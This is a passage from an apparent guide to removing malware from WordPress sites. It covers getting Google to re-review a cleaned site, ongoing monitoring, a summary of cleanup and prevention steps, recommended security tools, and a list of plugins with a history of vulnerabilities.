   • Check that the tools do not show any new suspicious files or code.
2. Google Safe Browsing check:
   • Google offers a Safe Browsing service that informs you about the status of your website. You can use the tool by visiting:
   • Google Safe Browsing and entering your website address.
   • If the website has been marked as unsafe, Google will indicate the details of the infection.

Submit to Google for re-evaluation

If your website has previously been marked as unsafe, you must submit it for re-evaluation so that Google can remove the warnings from its search results. This process is done through Google Search Console.

How to submit your website to Google:

1. Log in to Google Search Console:
   • If you do not yet have an account, you must first verify ownership of the site. To do this, add your site to Google Search Console and use one of the verification methods (e.g. uploading an HTML file or adding a DNS record).
2. Checking for security issues:
   • After logging into Google Search Console, go to the Security & Manual Actions section.
   • Check if your site is marked as infected or unsafe. Google will usually show details about the detected infection.
3. Requesting a review:
   • If you have removed the malware, click the Request a Review button.
   • In your request, describe the actions you have taken to remove the malware, e.g. “We have cleaned all infected files, updated WordPress and plugins, and performed a full server scan.”
4. Waiting for Google’s response:
   • After you submit your request, Google will review your site and notify you of the result within a few days. If your site is deemed safe, the warnings will be removed from search results.

Monitoring after reporting

After reporting your site to Google and removing the warnings, it is a good idea to regularly monitor your site’s status and security to prevent future infections.

How to monitor your site’s status:

• Google Search Console – Regularly check the Security and Manual Actions section to ensure that your website is not marked as unsafe again.
• Monitoring server logs – Tracking server logs (available in the hosting panel) will help you detect unusual activity on your website.

Verifying and reporting your site to Google is the final but extremely important step in the malware clean-up process. This allows you to remove warnings displayed to users and restore your site’s reputation in the search engine. Submitting your website to Google via Search Console ensures that it will be re-evaluated as safe, which is crucial for restoring user trust and improving website traffic.

Summary

Managing a WordPress website requires not only ensuring its functionality, but above all, its security. Malware infections can lead to serious consequences, including data loss, damage to reputation, and a lower ranking in search results. In this article, we have provided a detailed guide on how to remove malware from WordPress and restore full functionality to your website. Each step in this process is crucial for effectively eliminating threats and preventing future attacks.

Key steps in the process of removing malware and restoring security:

1. Diagnosing the problem – Identify the infection using scanning tools and manual analysis of suspicious files. This will allow us to determine how deeply the malware has penetrated our website.
2. Isolation and backup – Before taking any corrective action, disable the website and create a full backup to minimise the risk of data loss.
3. Malware removal – Manually remove suspicious files, restore the original WordPress files, and thoroughly analyse the wp-content directory, where malicious code is most often hidden.
4. Cleaning and repairing the database – Malware can also infiltrate the database, so it is necessary to analyse and remove malicious entries and then repair the database.
5. Updating WordPress, plugins, and themes – Regular updates of website components are crucial, as they often fix known security vulnerabilities that hackers can exploit.
6. Change passwords and login details – Once the infection has been removed, change the passwords of all users who have access to the admin panel, as well as the passwords for FTP, the database and the hosting account.
7. Verification and reporting to Google – Once the website has been cleaned, report it to Google so that malware warnings are removed from search results.
8. Preventing future infections – Effectively securing your website against future attacks requires restricting access to files, folders and the admin panel, regular backups and monitoring website activity.

Key principles for preventing future infections:

• Always keep WordPress, plugins, and themes updated to the latest version.
• Restrict access to the admin panel (wp-admin) using IP restrictions and an additional password.
• Make regular backups and check that they can be restored in case of problems.
• Update PHP to the latest stable version and ensure that your server meets current security standards.
• Monitor your server and website traffic using tools to detect unusual activity that may indicate potential attacks.

Remember that while removing malware is a time-consuming process, implementing the right security measures will prevent future attacks and save you a lot of trouble down the line.

Additional resources

To further secure your website and understand how to respond to threats, use the resources below. Here you will find tools, documentation, and useful guides to help you continue to administer your website and protect it from attacks.

Tools for diagnosing and removing malware:

1. PHP Malware Scanner – An open-source tool for scanning PHP files for malicious code. Excellent for manually scanning your server and analysing suspicious files.
2. PHP-Antimalware-Scanner – An effective tool for detecting and removing malware in PHP files, with a regularly updated threat database.
3. Google Safe Browsing – Check the status of your website and make sure it has not been marked as unsafe by Google.

Guides and documentation:

1. WordPress Codex – Official WordPress documentation. There you will find detailed instructions on how to configure your server, database, and WordPress files.
2. PHP Security Best Practices – A guide to best practices for securing PHP applications, including how to avoid common PHP security vulnerabilities.
3. Presentation: Conjure up peace of mind – A presentation on WordPress security, containing detailed advice based on real threats and ways to neutralise them. Although the presentation is not up to date, it will provide you with the necessary knowledge and make you aware of the actions you need to take.

Backup tools:

1. UpdraftPlus – A popular backup tool that automatically saves website files and databases to the cloud.
2. Duplicator – A tool for manually backing up and migrating WordPress websites.
3. BackupBuddy – A comprehensive backup solution that allows you to create regular backups and restore them quickly.** Remember not to leave these tools active all the time. They carry certain vulnerabilities.

Security testing and monitoring tools:

1. SSL Labs Server Test – A tool for testing the SSL/TLS configuration on your server to ensure that connections to your website are secure.
2. New Relic – An advanced tool for monitoring website performance and security that will help you identify performance issues and potential threats.
3. Google Search Console – An essential tool for managing your website’s presence in Google search results and monitoring potential security issues.

Preventing future infections is an ongoing process, so regular updates, monitoring, and implementing proven security practices are key to keeping your WordPress site secure from threats in the long term. By using the above resources and tools, you will be able to effectively protect your site and respond to potential threats before they become a problem.

Additional knowledge

Being aware of threats and knowing which plugins are more vulnerable to attacks can help you effectively secure your WordPress site. Hackers often exploit vulnerabilities in plugins, so it is crucial to regularly update these components of your site. Below is a list of the 20 most vulnerable plugins that have been targeted in the past and whose inadequate security can lead to website infection.

The 20 most vulnerable WordPress plugins:

1. Contact Form 7
   • One of the most popular plugins for creating contact forms, it has often been the victim of attacks due to vulnerabilities related to file uploads.
2. RevSlider (Slider Revolution)
   • In the past, it contained serious vulnerabilities that allowed attackers to take control of the website. It is now regularly updated, but still poses a threat if used in an older version.
3. WP GDPR Compliance
   • A plugin for managing GDPR compliance. A vulnerability was previously detected that allowed attackers to register an unauthorised administrator account.
4. Duplicator
   • A popular plugin for website migration. Older versions had vulnerabilities that allowed data to be stolen from backups.
5. WooCommerce
   • A very popular e-commerce plugin, which, due to its popularity, was a frequent target of SQL injection attacks.
6. Yoast SEO
   • A popular plugin for SEO optimisation. In the past, it contained vulnerabilities that allowed cross-site scripting (XSS), but it is now regularly updated.
7. Ultimate Member
   • A plugin for creating membership sites, in which vulnerabilities were discovered that allowed attackers to escalate privileges to the administrator account.
8. NextGEN Gallery
   • A popular plugin for managing photo galleries, earlier versions of which were vulnerable to SQL injection attacks.
9. WP Super Cache
   • A caching plugin that in the past had XSS vulnerabilities allowing malicious code to be injected.
10. All in One SEO Pack
    • A popular SEO plugin that had several critical vulnerabilities, including XSS and SQL injection.
11. WPBakery (Visual Composer)
    • A plugin for building pages using a visual editor. Older versions had security vulnerabilities that allowed XSS attacks.
12. Easy WP SMTP
    • An SMTP plugin whose vulnerabilities could be exploited to reset user passwords without their knowledge.
13. File Manager
    • A very useful but vulnerable plugin that allows you to manage WordPress files directly from the panel. Serious vulnerabilities have been detected in it, allowing malicious files to be uploaded.
14. ThemeGrill Demo Importer
    • A plugin for importing ThemeGrill demo themes. It had a vulnerability that allowed the page to be reset and administrator privileges to be taken over.
15. WooCommerce Checkout Manager
    • A plugin for managing the purchasing process in WooCommerce, which contained vulnerabilities that allowed XSS attacks.
16. Jetpack
    • A popular plugin offering a range of features, from security to traffic analysis. It has had several critical vulnerabilities in the past, including XSS and CSRF.
17. WP Fastest Cache
    • A caching plugin with XSS-related issues that could be exploited by attackers to inject malicious code.
18. Loginizer
    • A plugin for protecting websites against brute force attacks, which contained vulnerabilities allowing unauthorised password resets.
19. Advanced Custom Fields
    • A popular plugin for managing custom fields. Earlier versions had vulnerabilities that allowed XSS attacks.
20. Yellow Pencil Visual Theme Customiser
    • A theme editing plugin that had a vulnerability allowing remote upload of malicious files to the server.

Using plugins is an integral part of managing a WordPress site, but each one can pose a potential threat if not updated regularly. It is important to:

• Regularly update all installed plugins.
• Avoid using plugins that are no longer supported by their developers.
• Keep track of security vulnerabilities for the plugins you use and take corrective action when new issues are discovered.

Remember that a secure WordPress site is not only a well-programmed site, but also a site that uses the latest, secure versions of plugins and themes.